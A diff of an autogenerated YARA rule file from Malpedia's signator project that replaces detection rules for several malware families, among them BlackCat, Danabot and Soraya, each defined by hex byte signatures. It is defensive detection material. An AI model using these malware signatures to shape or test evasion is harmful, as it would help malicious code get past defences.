-rule MALPEDIA_Win_Aukill_Auto : FILE
+rule MALPEDIA_Win_Powershellrunner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db9d4a1a-ed53-5fea-bff5-185747bfbb51"
+		id = "46b69b90-7940-5db2-80f3-f8192ab438b0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aukill_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powershellrunner_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "cf5c7585c61eda7d5c6a56885b3d8ed6928646fd3abef78ed34135b918e268f8"
+		logic_hash = "b42437163f86140159e67a0a5b01330144313dc98950bc6641d4e09d38867635"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126736,34 +127019,34 @@ rule MALPEDIA_Win_Aukill_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8905???????? c705????????02000000 48c705????????04000000 ff15???????? }
-		$sequence_1 = { 751d 488bcb ff15???????? ff15???????? }
-		$sequence_2 = { 7410 488bcf e8???????? 33c9 ff15???????? }
-		$sequence_3 = { 4489442420 453b01 7346 4b8d1440 410f104cd108 }
-		$sequence_4 = { 488bd3 33c9 ff15???????? 85c0 751f 488b4c2458 ff15???????? }
-		$sequence_5 = { ff15???????? 488bf8 4885c0 7514 ff15???????? }
-		$sequence_6 = { c744243c02000000 448d4810 4889442420 ff15???????? 85c0 751f 488b4c2458 }
-		$sequence_7 = { 4533c0 33d2 33c9 ff15???????? 4885c0 7409 488bc8 }
-		$sequence_8 = { 33c0 4889442428 c744243001000000 c744243c02000000 448d4810 4889442420 ff15???????? }
-		$sequence_9 = { 48894c2420 448d4920 48894c2450 488b0d???????? }
+		$sequence_0 = { 498bce ff15???????? 488bd8 eb02 33db 4c8d35e900ffff 4885db }
+		$sequence_1 = { 488d058f9b0000 488bd9 483bc8 7417 8b815c010000 85c0 750d }
+		$sequence_2 = { 4053 4883ec20 8bd9 4c8d0d19300100 b901000000 4c8d0505300100 488d1506300100 }
+		$sequence_3 = { 4c8d8424a0000000 33d2 488b4c2438 ff15???????? 85c0 }
+		$sequence_4 = { 4439ac24b8000000 0f87de000000 03bc24b8000000 488b542440 4c8d1d841d0100 }
+		$sequence_5 = { 85c0 7439 488b542438 488b4c2440 e8???????? }
+		$sequence_6 = { 488b442460 488b4c2470 488d4488fc 488bc8 e8???????? 488b4c2460 488b542468 }
+		$sequence_7 = { c68424a000000033 c68424a100000036 c68424a200000039 c68424a30000003a c68424a400000026 c68424a500000030 c68424a600000055 }
+		$sequence_8 = { ff15???????? e8???????? 85c0 7426 488d442434 4889442428 c744242000000000 }
+		$sequence_9 = { 4533c0 488b542458 33c9 ff15???????? 85c0 7529 488b4c2458 }
 
 	condition:
-		7 of them and filesize < 446464
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Unidentified_069_Auto : FILE
+rule MALPEDIA_Win_Soraya_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e6d12ecf-2105-5a78-ac5d-ef3697e64524"
+		id = "c1b5e4fb-ecf1-56e9-b7ee-f112f17e5f08"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_069_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.soraya_auto.yar#L1-L234"
 		license_url = "N/A"
-		logic_hash = "ca9594399e09dcc31b85088d5c725560cc890838ff6242191d21562960d61f9b"
+		logic_hash = "9c021471b4a00823554f7973fdcdc5043a2447611e50ed019058643f5ab74f68"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -126775,33 +127058,46 @@ rule MALPEDIA_Win_Unidentified_069_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bf8 83c428 83ffff 7428 8d041f }
-		$sequence_1 = { 8bc6 c1e710 e8???????? 0fb7c0 0bc7 8945cc }
-		$sequence_2 = { 8b4514 5f 85c0 7402 8930 e8???????? 33c0 }
-		$sequence_3 = { 46 3bf2 72c2 5f 5e 33c0 66890451 }
-		$sequence_4 = { 8d55e0 894df4 e8???????? 897dfc 66393d???????? 0f8487000000 53 }
-		$sequence_5 = { 837e2421 c645fa00 722d 6a0e 8d7dc0 }
-		$sequence_6 = { 85d2 741a 8d4618 8b08 85c9 7611 50 }
-		$sequence_7 = { 85f6 7628 57 8d7c3602 85ff 741e 8bc7 }
-		$sequence_8 = { 8b44242c e8???????? 83671800 83671c00 68???????? 68???????? ff7510 }
-		$sequence_9 = { 8d856cfeffff 50 e8???????? 8bcf 899de0fdffff }
+		$sequence_0 = { ff15???????? 8d48bf 80f919 77f2 }
+		$sequence_1 = { 4885c0 0f84cb000000 448d432f 488d157bf3ffff 4d8bcd 488bc8 4489642420 }
+		$sequence_2 = { ff55d4 8b4dfc 33cb 2bcf 3bc8 }
+		$sequence_3 = { 83c40c 894510 85ff 743c 81ff88130000 7334 813b504f5354 }
+		$sequence_4 = { 037d0c 3bc7 72cb 8b7d10 33f9 }
+		$sequence_5 = { 7522 448d4b04 ff15???????? 488b4c2430 4c8d442430 }
+		$sequence_6 = { 8b4d94 33c6 2bc3 33c1 a900100000 }
+		$sequence_7 = { 488bcb ff15???????? 488d4dd0 ff15???????? 488b0d???????? 488364242000 488d5150 }
+		$sequence_8 = { f7f9 0fb6c2 d1e8 c21000 55 8bec }
+		$sequence_9 = { 897dfc 8b07 03c3 50 ff55f0 }
+		$sequence_10 = { c3 b401 c3 e8???????? }
+		$sequence_11 = { 49ffc0 413bd2 72db 418bd6 3bcb 72c8 4c891d???????? }
+		$sequence_12 = { 498d4e40 4d2bc6 0fb701 6641398408a0010000 7530 ffc2 }
+		$sequence_13 = { 0f8577ffffff 33c0 5f 5e 5b c9 }
+		$sequence_14 = { 8365f800 8365fc00 8d42b1 85c0 746c 53 56 }
+		$sequence_15 = { 8d45d8 50 e8???????? 8b45fc 8b4df4 }
+		$sequence_16 = { 0f8573020000 8b5d1c 837d3000 7502 8bdf 8b7d2c a1???????? }
+		$sequence_17 = { 4c03eb 448be6 4803c2 48898424c8020000 39741d18 }
+		$sequence_18 = { 8b4dd4 894dd0 8b4dd8 894dd4 }
+		$sequence_19 = { 85c0 750b ff75fc ff15???????? eb1d 33c0 }
+		$sequence_20 = { 488bd6 498bcf ff15???????? 488bcd e9???????? 8b543050 486344323c }
+		$sequence_21 = { 40 eb05 c1d30b 33c0 5f 5e }
+		$sequence_22 = { 8d0c8b 66397102 7537 0fb709 bf1f600000 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Wndtest_Auto : FILE
+rule MALPEDIA_Win_Jessiecontea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4e765db5-5f4c-5512-83db-9314a470b113"
+		id = "435a6af2-0956-5ced-bef4-bdde8bb54520"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wndtest_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jessiecontea_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "6715ba88802d5ba703391f2c7044c94873e31517f5f99099b0c4158e2dd1a5c1"
-		score = 50
+		logic_hash = "901d415627c4e09bca131d66822cb1b54da6638557cfa44cdd1fbdb71a4f0951"
+		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
@@ -126814,32 +127110,38 @@ rule MALPEDIA_Win_Wndtest_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 0fbe7001 33750c 57 8d4e01 51 }
-		$sequence_1 = { 8b0d???????? 53 56 0fbe7001 }
-		$sequence_2 = { 8bf0 56 6803000010 57 ffd3 85c0 741c }
-		$sequence_3 = { ff15???????? 8b3d???????? 85ff 7444 8bcb 8bc7 }
-		$sequence_4 = { 6a01 6a00 6a07 6a00 ff15???????? 8d7eff }
-		$sequence_5 = { 8d4e01 51 e8???????? 83c404 33c9 }
-		$sequence_6 = { ffd7 8b15???????? a3???????? a1???????? 52 50 e8???????? }
-		$sequence_7 = { ffd7 8d55e0 52 ffd3 6a00 }
-		$sequence_8 = { 83c410 56 53 ffd7 50 }
-		$sequence_9 = { 75ea 8bcb 0fb6d2 c1e918 33ca }
+		$sequence_0 = { 8bf0 ff15???????? 8b4dfc 83c414 8bc6 }
+		$sequence_1 = { 83f8ff 0f8411020000 8b3d???????? 6683bdc0fbffff2e }
+		$sequence_2 = { 3d04010000 7d8f 6a00 6a00 50 }
+		$sequence_3 = { 50 8d043e 50 ff35???????? }
+		$sequence_4 = { 57 89bd8cfbffff 898590fbffff ffd6 3d00010000 }
+		$sequence_5 = { 51 85c0 7406 83c002 50 eb01 57 }
+		$sequence_6 = { 8d95acf3ffff 8bce e8???????? 83c404 85c0 }
+		$sequence_7 = { 83c40c 8d85e8fdffff 6805010000 6a00 }
+		$sequence_8 = { 6689953e010000 66898540010000 b823000000 6689b542010000 6644899544010000 66898546010000 }
+		$sequence_9 = { 6689857e010000 8b05???????? 4133c6 66898580010000 0fb705???????? }
+		$sequence_10 = { 57 488bec 4883ec68 8b3d???????? 4c8d4d18 33c0 }
+		$sequence_11 = { 4889442420 4c8d4580 418d5601 ff15???????? 488b5580 }
+		$sequence_12 = { 4889442420 4533c9 8974247c 4c8d4590 48895d98 }
+		$sequence_13 = { 6683c032 83f03b 66894528 8b45c0 6683c033 83f020 }
+		$sequence_14 = { 4c89a424e8020000 41bc02000000 6644896580 894584 ff15???????? }
+		$sequence_15 = { 33c1 6689442476 8b442450 6683c012 }
 
 	condition:
-		7 of them and filesize < 901120
+		7 of them and filesize < 413696
 }
-rule MALPEDIA_Win_Wmighost_Auto : FILE
+rule MALPEDIA_Win_Danabot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4ae59171-3faf-5182-8f52-dee99c964f8d"
+		id = "88731f6d-edda-5181-ab28-b879b1e82348"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wmighost_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.danabot_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "e0508af85bc342ca28af7aa1d71f7f0ca199aee7b1652eae79524bd3a3802f63"
+		logic_hash = "0aacaade997adfab10265dc65b353035ffe85eb407c689ce61c2eca9a9f37b60"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126853,34 +127155,34 @@ rule MALPEDIA_Win_Wmighost_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 68???????? 8d8df0fcffff 51 }
-		$sequence_1 = { 8a15???????? 33ca 8b45f8 8888c8304000 ebb0 c745fc???????? }
-		$sequence_2 = { f3ab 66ab aa c6858caeffff00 b9ff090000 }
-		$sequence_3 = { c3 55 8bec 83ec08 894df8 8b4508 50 }
-		$sequence_4 = { 8945f0 837df000 7d12 68???????? 8b45ec }
-		$sequence_5 = { 52 8d85f0fcffff 50 e8???????? 83c408 68???????? }
-		$sequence_6 = { 8a0d???????? 33c1 8b55f8 8882c8304000 8b45f8 0fbe88c8304000 33d2 }
-		$sequence_7 = { 50 ff5238 8945fc 837dfc00 7d12 68???????? }
-		$sequence_8 = { 8bec 83ec08 894df8 668b4508 50 }
-		$sequence_9 = { 8b45b4 8945b0 c645fc04 8d4de8 }
+		$sequence_0 = { 8b0f 8b16 e8???????? 8b07 50 8b442424 }
+		$sequence_1 = { 0305???????? 8b15???????? 0315???????? 3bc2 7e0a }
+		$sequence_2 = { e8???????? c645f690 c645f790 648f0500000000 }
+		$sequence_3 = { c1e020 03c3 8906 8b06 e8???????? 8b55f8 }
+		$sequence_4 = { 8b16 e8???????? 8b07 50 8b442428 50 6a0a }
+		$sequence_5 = { 55 68???????? 64ff30 648920 6a02 6800040000 8b75f8 }
+		$sequence_6 = { 50 8b44241c 50 6a0b }
+		$sequence_7 = { e8???????? 8d45f8 e8???????? bb???????? 33c0 55 }
+		$sequence_8 = { 68???????? 64ff30 648920 a1???????? a3???????? a1???????? 0305???????? }
+		$sequence_9 = { 8b0424 8b00 8903 8b0424 8b4004 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Neutrino_Auto : FILE
+rule MALPEDIA_Elf_Blackcat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a95af10-a741-56c4-8bb8-54cc2e65dd52"
+		id = "a1fea123-6f91-5435-8619-28347a7f06ff"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neutrino_auto.yar#L1-L330"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.blackcat_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "326fe9ea9352871202c596bbb0d54c8449971285bd5a9b495a305700faaa6e71"
+		logic_hash = "630d3dc7c9122b8f92125090dcb7617ef29586df7b1f7e85bb11a06ca666eb4d"
 		score = 60
-		quality = 43
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -126892,56 +127194,32 @@ rule MALPEDIA_Win_Neutrino_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? c1e010 50 ff15???????? }
-		$sequence_1 = { 50 6a0b 6a07 e8???????? }
-		$sequence_2 = { 50 6a05 6a03 e8???????? }
-		$sequence_3 = { 0404 0404 0402 0202 0202 }
-		$sequence_4 = { 837d0800 7408 8b4508 a3???????? 8b0d???????? 894df8 eb09 }
-		$sequence_5 = { 8b45ac 50 ff15???????? 8945d0 837dd000 }
-		$sequence_6 = { 0fbe08 3bd1 7513 8b55f4 c60200 8b45f4 83c001 }
-		$sequence_7 = { 8b4df8 0fbe11 3bc2 740b 8b45fc 83c001 8945fc }
-		$sequence_8 = { 83c001 8945fc ebdb 8b4dfc 0fbe11 85d2 7502 }
-		$sequence_9 = { 8b4d0c 894dfc 8b55f4 0fbe02 85c0 7447 8b4df4 }
-		$sequence_10 = { 6a00 6a00 e8???????? 83c40c 0fb6c0 }
-		$sequence_11 = { e9???????? 6a01 ff15???????? 85c0 }
-		$sequence_12 = { 0404 010404 0202 020402 0404 }
-		$sequence_13 = { 8945fc 8b4d08 83c101 894d08 0fb6550c 83fa01 7509 }
-		$sequence_14 = { 50 ff15???????? 837dfc00 0f95c0 8be5 }
-		$sequence_15 = { 020402 0404 0404 0404 0404 0404 0403 }
-		$sequence_16 = { 6a00 ff15???????? 6880000000 ff15???????? }
-		$sequence_17 = { 8b55f8 83c201 8955f8 8b45f8 0fbe08 85c9 7439 }
-		$sequence_18 = { 83ec14 8b4508 53 57 6a1c 8945f4 59 }
-		$sequence_19 = { 75f4 c3 8b4804 890e ff4808 897004 751e }
-		$sequence_20 = { 7448 f645fe40 7420 f645ff08 0f8485000000 814a1808010000 }
-		$sequence_21 = { 0f879a000000 807dfd01 0f8597000000 e9???????? 2d8c000000 747e 48 }
-		$sequence_22 = { 807dfd04 c645fc03 0f84ae000000 807dfd05 eb12 807dfd04 }
-		$sequence_23 = { 83c302 f645fe02 740a 834a1804 8a03 884210 43 }
-		$sequence_24 = { 7408 83c6fb a5 66a5 eb01 a5 }
-		$sequence_25 = { 7409 8bd0 8b00 85c0 75f4 c3 8b4804 }
-		$sequence_26 = { 8d85b8feffff 50 68???????? ff15???????? 8945fc }
-		$sequence_27 = { 83c40c 6804010000 8d85f8fdffff 50 }
-		$sequence_28 = { ff750c ff7508 ff15???????? 83f8ff 0f95c0 5d }
-		$sequence_29 = { eb05 68???????? 50 ff510c }
-		$sequence_30 = { 57 33ff 393d???????? 7522 be???????? ff15???????? 57 }
-		$sequence_31 = { 50 ff15???????? 6a40 ff75f0 }
-		$sequence_32 = { 85c0 7412 68???????? 50 ff15???????? f7d8 }
-		$sequence_33 = { ff15???????? 6a64 e8???????? 59 }
+		$sequence_0 = { 81fa???????? 720d b805000000 81faffffff0f }
+		$sequence_1 = { 7227 b903000000 81fa???????? 721a }
+		$sequence_2 = { 81f9???????? 0f823fffffff b802000000 81f9???????? 0f822effffff }
+		$sequence_3 = { 0f823fffffff b802000000 81f9???????? 0f822effffff }
+		$sequence_4 = { 721a b804000000 81fa???????? 720d b805000000 81faffffff0f }
+		$sequence_5 = { b802000000 81f9???????? 7227 b803000000 81f9???????? 721a }
+		$sequence_6 = { 6685db 7404 660fbccb 0fb7c9 }
+		$sequence_7 = { 81fa???????? 721a b904000000 81fa???????? }
+		$sequence_8 = { 81f9???????? 0f823fffffff b802000000 81f9???????? }
+		$sequence_9 = { 0fb6c8 8d1489 8d0cd1 c1e90c 6bd164 28d0 }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 8011776
 }
-rule MALPEDIA_Win_Shifu_Auto : FILE
+rule MALPEDIA_Win_Teleport_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "48f59764-98d3-5e1f-a9c7-a0c8becc007a"
+		id = "27108ab3-6cb2-5111-9364-d7f24d03816a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shifu_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.teleport_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "6ab041a16a39f77276573be25c06c5ab679b44b2bef49091360ddb3582fc5f89"
+		logic_hash = "833087ce8b406b0ed8db8d58a090084d0531be2127d4429df6d3e776d65bddb6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126955,34 +127233,34 @@ rule MALPEDIA_Win_Shifu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 32c0 8d7d9c 6a08 f3aa 58 e8???????? }
-		$sequence_1 = { 50 8b470c 6a00 83c030 50 6a01 ffd3 }
-		$sequence_2 = { 83c8ff ebf0 55 8bec eb0a 8b4d08 48 }
-		$sequence_3 = { 8bc4 85c0 7411 6894000000 6a0b ba???????? e8???????? }
-		$sequence_4 = { 6a0c 5e e8???????? 8945f8 3bc7 0f847d030000 897808 }
-		$sequence_5 = { 83e203 c1e204 c1eb04 0bd3 8a1402 885601 }
-		$sequence_6 = { e8???????? 8bc4 85c0 7411 6889000000 6a0a }
-		$sequence_7 = { c645ff01 eb4a 807dff00 740f 8bf3 e8???????? 85c0 }
-		$sequence_8 = { 8bc4 85c0 7411 6882000000 6a0b ba???????? e8???????? }
-		$sequence_9 = { d1e8 8bf0 eb05 85db 7401 4b 83fb01 }
+		$sequence_0 = { 330c8560ba4200 0fb6c2 8b55f4 330c8560b64200 334f30 }
+		$sequence_1 = { c1e810 33148da0e24200 8b4df8 0fb6c0 }
+		$sequence_2 = { 75f5 2bcf d1f9 7429 8bca 8d4102 8985ccf7ffff }
+		$sequence_3 = { 8b4df4 c1e918 331485a0fa4200 8b45fc 0fb6c0 331485a0f64200 339774ffffff }
+		$sequence_4 = { 3041ff 83ea01 75f2 eb0d 0f100f 0f1003 660fefc8 }
+		$sequence_5 = { 660fd60f 8d7f08 8b048d841c4100 ffe0 f7c703000000 7413 8a06 }
+		$sequence_6 = { 8bca c1e918 8bc2 8b0c8d60c24200 c1e810 0fb6c0 330c8560be4200 }
+		$sequence_7 = { 8b8514feffff 83c840 8d8d00feffff c645fc0a 83c808 eb54 c785f0fdffff80b54200 }
+		$sequence_8 = { 8a87fc314300 08441619 42 0fb64101 3bd0 76e5 }
+		$sequence_9 = { 52 8b01 8b4010 ffd0 84c0 747e 68???????? }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE
+rule MALPEDIA_Win_Skipper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c76663f4-5d9b-5e27-96de-31f5287939c0"
+		id = "64a2fa4c-6691-570a-b99c-c64694f81fbb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rapid_ransom_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.skipper_auto.yar#L1-L436"
 		license_url = "N/A"
-		logic_hash = "420102af1054256a36b0f8f07d0daf89ae38632ab058ebfe54352c8eea1f1c3e"
+		logic_hash = "a0d077545acb481645aa7b1b148ae369d0e9c4615de07cc8af0856e7c8c6f15a"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -126994,74 +127272,107 @@ rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 6801000004 6800a40000 ff75f8 ff15???????? }
-		$sequence_1 = { 894dec e8???????? 6a6a 8d87ea010000 8d8e00020000 50 51 }
-		$sequence_2 = { e8???????? 33d2 8d7f01 f7f6 80c261 8857ff 4b }
-		$sequence_3 = { 7402 b301 ff75fc ff15???????? 6a00 ff75f8 }
-		$sequence_4 = { 85c0 7474 8d45fc c745fc00000000 }
-		$sequence_5 = { 6800010000 50 56 8b35???????? 6a00 6a01 }
-		$sequence_6 = { ff74243c ff15???????? 8a4c240e 84c9 }
-		$sequence_7 = { 8d44240e 50 ff7510 8d442440 56 50 ff5514 }
-		$sequence_8 = { 6a00 50 e8???????? 8b45fc 83c40c c60000 }
-		$sequence_9 = { 8b35???????? 33ff c705????????00000000 85f6 }
-		$sequence_10 = { 83c404 8bc6 5e 5f c3 6a09 }
-		$sequence_11 = { 56 e8???????? 83c404 ff75d4 e8???????? 83c404 53 }
-		$sequence_12 = { c745d400000000 50 57 ff15???????? }
-		$sequence_13 = { 83fa1a 0f8cddfeffff 68???????? e8???????? }
-		$sequence_14 = { 58 6bc000 c78034c9410002000000 6a04 58 6bc000 }
+		$sequence_0 = { 6a00 6a00 6a03 68???????? 68???????? 6a50 }
+		$sequence_1 = { e8???????? 6804010000 e8???????? 6804010000 8bf8 6a00 }
+		$sequence_2 = { ff15???????? 6a00 6a00 6a00 6a00 50 ff15???????? }
+		$sequence_3 = { 6800803801 6a00 ff37 e8???????? 6804010000 c7470400000000 }
+		$sequence_4 = { 0fb6c1 8b4d08 0fb68405fcfeffff 320439 }
+		$sequence_5 = { 6804010000 6a00 50 8945e0 e8???????? }
+		$sequence_6 = { 0fb68405fcfeffff 320439 47 8847ff 4e 0f8568ffffff 8b4dfc }
+		$sequence_7 = { 0385f8feffff 898df4feffff 25ff000080 7907 48 0d00ffffff }
+		$sequence_8 = { e8???????? 83c404 6a00 6a64 52 }
+		$sequence_9 = { 6800308000 6a00 6a00 68???????? }
+		$sequence_10 = { 038de8feffff 8b85e0feffff 99 f77d0c 8b4508 }
+		$sequence_11 = { 8b85e0feffff 83c001 8985e0feffff 81bde0feffff00010000 0f8d84000000 8b8de0feffff 0fb68c0df0feffff }
+		$sequence_12 = { 44880a 410fb610 4103d1 81e2ff000080 7d0a }
+		$sequence_13 = { 8a85effeffff 888415f0feffff 0fb64df8 0fb6940df0feffff }
+		$sequence_14 = { 81c900ffffff 41 898de8feffff 8b85e0feffff 8a8c05f0feffff 888deffeffff 0fb695e8feffff }
+		$sequence_15 = { 8d1492 03d2 2bc2 4863d0 420fb60432 4403c0 }
+		$sequence_16 = { 4863d0 420fb60432 4403c0 4403c6 4181e0ff000080 7d0d 41ffc8 }
+		$sequence_17 = { ebd0 c785e8feffff00000000 c785e0feffff00000000 eb0f 8b85e0feffff 83c001 }
+		$sequence_18 = { 450fb608 4803d0 0fb602 418800 }
+		$sequence_19 = { 7d0d 41ffc8 4181c800ffffff 41ffc0 410fb6c0 488d1424 }
+		$sequence_20 = { e9???????? c785dcfeffff00000000 eb0f 8b8ddcfeffff 83c101 }
+		$sequence_21 = { 48 0d00ffffff 40 8945f8 8b4df8 0fb6940df0feffff }
+		$sequence_22 = { ffc0 488d5201 3d00010000 7cf1 448bc1 448bc9 }
+		$sequence_23 = { 8b4508 0fb61410 03ca 81e1ff000080 }
+		$sequence_24 = { 0fb602 8843ff 408832 4181f900010000 7c9a 488bdd 85ed }
+		$sequence_25 = { 488d1424 4c03c0 410fb6c2 450fb608 4803d0 }
+		$sequence_26 = { 448bf0 0f85f3000000 488d0d20590000 33d2 41b800080000 ff15???????? 488bd8 }
+		$sequence_27 = { 668986be010000 c74668885a4100 6a0d e8???????? 59 }
+		$sequence_28 = { 743c 8b75e0 8bc6 c1f805 83e61f c1e606 03348520b72300 }
+		$sequence_29 = { 488b442450 488d0d75a80000 488b0cc1 4c8d4c244c 488d9520060000 498b0c0c 895c2448 }
+		$sequence_30 = { c3 48895c2408 57 4883ec20 488d1de7a40000 488d3de0a40000 eb0e }
+		$sequence_31 = { 8810 33ff 8d5001 8b048d606d4100 }
+		$sequence_32 = { 59 8b7508 8d34f570a02300 391e 7404 8bc7 eb6e }
+		$sequence_33 = { 56 56 56 e8???????? 83c414 8b45fc ff34c51ca92300 }
+		$sequence_34 = { 7509 488d0deee90000 eb02 33c9 e8???????? 4883c438 c3 }
+		$sequence_35 = { 8d0c8d20b72300 8901 8305????????20 8d9000080000 }
+		$sequence_36 = { 7456 8b4de0 8d0c8d20b72300 8901 }
+		$sequence_37 = { 8965ec 6aff 6a00 8d4520 c741140f000000 c7411000000000 50 }
+		$sequence_38 = { 8a8c181d010000 8888b0a52300 40 ebe6 }
+		$sequence_39 = { 3b1cfd18a92300 7409 47 897dfc 83ff17 72ee }
+		$sequence_40 = { 4c8d157da80000 33d2 4d8bc2 448d4a08 }
+		$sequence_41 = { c785d4feffffffff1f00 8b4508 50 6a00 8b8dd4feffff 51 }
+		$sequence_42 = { 8078035c 7505 8b75f0 03f0 83c005 83c205 }
+		$sequence_43 = { 41b894000000 488908 8b0d???????? 894808 0fb60d???????? }
+		$sequence_44 = { ff15???????? 448be8 85c0 0f8449010000 488b4c2450 488364242000 488d052fab0000 }
+		$sequence_45 = { 8b5c2444 e9???????? 488d05dfa90000 4a8b0ce8 41f6440c0880 0f84cb020000 33db }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Skip20_Auto : FILE
+rule MALPEDIA_Win_Unidentified_063_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15b7373a-f84f-57db-8d95-802539d58928"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.skip20_auto.yar#L1-L102"
+		id = "d22cba4e-b95b-5578-ac95-09534bd7dc14"
+		date = "2022-11-21"
+		modified = "2022-11-25"
